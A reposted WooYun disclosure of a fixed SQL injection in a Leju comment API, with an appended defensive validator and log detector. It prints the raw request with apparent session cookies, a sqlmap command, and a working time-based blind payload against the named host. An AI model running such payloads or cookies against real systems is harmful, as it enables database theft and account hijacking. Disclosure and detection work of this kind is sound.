SQL injection in a Sina Leju (新浪乐居) API endpoint

admin · 2017-04-25 01:59:41 · 229 views
Summary

2016-04-23: Details reported to the vendor; awaiting vendor response
2016-04-24: Vendor confirmed; details disclosed to the vendor only
2016-04-25: Vendor fixed the vulnerability and disclosed it proactively; details made public

Vulnerability overview (4 followers)

Defect ID: WooYun-2016-199491

Title: SQL injection in a Sina Leju (新浪乐居) API endpoint

Vendor: leju.com

Author: null_z

Submitted: 2016-04-23 09:23

Fixed: 2016-04-25 11:06

Published: 2016-04-25 11:06

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Fixed by vendor

Source: www.wooyun.org; for questions or help please contact

Tags: PHP + string-type injection, MySQL



Vulnerability details


Brief description:

SQL injection

Detailed description:

Injection parameter: uid

Code:
GET /api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011* HTTP/1.1
Host: comment.leju.com
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Accept-Encoding: gzip, deflate, sdch
Host: comment.leju.com
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
Connection: keep-alive
Referer: http://hf.leju.com/news/2016-04-22/08186129070685173370162.shtml
Cookie: M_AUTH=bcf97a064686696b03c5be538b6759fe74a9086b; M_USER=eNpdj8GKAjEMhp%2BmXoQl7bRNcuhhdAoWtlWnncOcZGbcZXEfYNGn3ypeFAL%2FT%2FKFP1nF0xA6pxjBoAYpV7WRfZ%2Fa6J3wKFiLloS3gkhs8IU77PbJu2p8bMPn3eQxl1AX4QMkKcUAa6kNEUgGU%2Bchl13oOzfe%2BstYjtd4%2B0lDAR4vv9f4J5qu1gPL%2B6Hfeoeap7mZLdlGWQJr4YxoiSUa%2BUVSPdhNSJ1b9DJp1dAEM1dRcF4WAzzZbzSkeb4fF1L7%2Fmp5Bql%2F1hZEWg%3D%3D; M_KEY=YmNhNzljMjFZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0T0Rnek1EVT0yZGY4; M_INFO=%7B%22uid%22%3A%222970574011%22%2C%22username%22%3A%22%5Cu7528%5Cu62372970574011%22%2C%22isThird%22%3Atrue%2C%22phone%22%3A%22%22%2C%22headurl%22%3A%22http%3A%5C%2F%5C%2Fp4.sinaimg.cn%5C%2F2970574011%5C%2F180%22%2C%22iscard%22%3Afalse%7D; M_UID=2970574011; M_ITSOURCE=749ab3b68632680660d776891751e812; M_SPRING=YzRjYTQyMzhNUT09YjkyMw%3D%3D; M_TICKET=NGU5ZDc4Y2RZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0TURFNU1EVmZNamszTURVM05EQXhNUT09ZWE5Yw%3D%3D; pgv_pvi=1220687872; city=wh; wapparam=wap2web; citypub=wh; extern_host=hf.leju.com; gatheruuid=56f63df72a5ab810

Proof of vulnerability:

Code:
sqlmap -r 1.txt --dbms=mysql --current-db --technique=T

Code:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://comment.leju.com:80/api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011') AND (SELECT * FROM (SELECT(SLEEP(5)))sslJ) AND ('lITm'='lITm
---
[22:49:28] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[22:49:57] [INFO] confirming MySQL
[22:49:57] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[22:50:37] [INFO] adjusting time delay to 4 seconds due to good response times
[22:50:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[22:50:37] [INFO] fetching current database
[22:50:37] [INFO] retrieved: comment_leju_com
current database: 'comment_leju_com'
[23:09:23] [INFO] fetched data logged to text files under '/Users/null0z/.sqlmap/output/comment.leju.com'

Fix suggestion:

~~~
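The report leaves the fix section empty. As an added example that is not part of the report or the vendor's code, the following shows the two defensive checks that close the gap described above: an allow-list validation of the `uid` parameter (the endpoint treats it as a user id, so only digits should ever reach the query) and a log-side detector for the time-based blind payload shape sqlmap produced (`') AND (SELECT ... SLEEP(5) ...`). The regexes, the request-line format and the sample requests are assumptions constructed for this example.

```python
# Added example (not from the original report): input validation for the uid
# parameter and log-side detection of time-based blind SQL injection attempts.
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Heuristics for time-based blind payloads. SLEEP/BENCHMARK are MySQL (the
# DBMS in the report); the others cover common equivalents. Assumed patterns.
TIME_BASED = re.compile(
    r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR\s+DELAY)\s*\(", re.IGNORECASE)
# A quote followed by an optional ')' and a boolean operator: the classic
# string-context breakout seen in the report's payload.
QUOTE_BREAK = re.compile(r"['\"]\s*\)?\s*(AND|OR)\b", re.IGNORECASE)


def is_valid_uid(value: str) -> bool:
    """Allow-list check: a uid for this endpoint is a plain decimal user id."""
    return re.fullmatch(r"[0-9]{1,20}", value) is not None


def inspect_request(request_line: str) -> dict:
    """Parse one 'METHOD URI PROTO' line and report findings on the uid parameter."""
    method, uri, _proto = request_line.split(" ", 2)
    # parse_qs percent-decodes values, so the payload is inspected in clear text.
    query = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    uid = query.get("uid", [""])[0]
    decoded_uri = unquote_plus(uri)
    return {
        "method": method,
        "uid": uid,
        "uid_valid": is_valid_uid(uid),
        "time_based_payload": TIME_BASED.search(decoded_uri) is not None,
        "quote_break": QUOTE_BREAK.search(decoded_uri) is not None,
    }


def scan_requests(lines) -> list:
    """Return the inspection results that should raise an alert."""
    return [r for r in map(inspect_request, lines)
            if not r["uid_valid"] or r["time_based_payload"] or r["quote_break"]]


# Constructed sample request lines (not real traffic): a normal call, then an
# attempt shaped like the report's payload, percent-encoded as it would appear
# in an access log. KEY is a placeholder for the endpoint's key parameter.
SAMPLE_REQUESTS = [
    "GET /api/comment/getcomment?callback=cb&key=KEY&unique_id=1&uid=2970574011 HTTP/1.1",
    "GET /api/comment/getcomment?callback=cb&key=KEY&unique_id=1&uid=2970574011%27%29"
    "%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29x%29"
    "%20AND%20%28%27a%27%3D%27a HTTP/1.1",
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print("ALERT:", finding)
```

On the server side the same `is_valid_uid` check, combined with a parameterized query, is what removes the string-context injection; the detector is for spotting probes in historical logs.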

Copyright notice: please credit the source when reposting: null_z @ WooYun (乌云)


Responses

Vendor response:

Severity: High

Rank: 10

Confirmed: 2016-04-24 13:49

Vendor reply:

Thank you very much for your attention to Leju.

Latest status:

2016-04-25: The vulnerability has been fixed; thanks again.

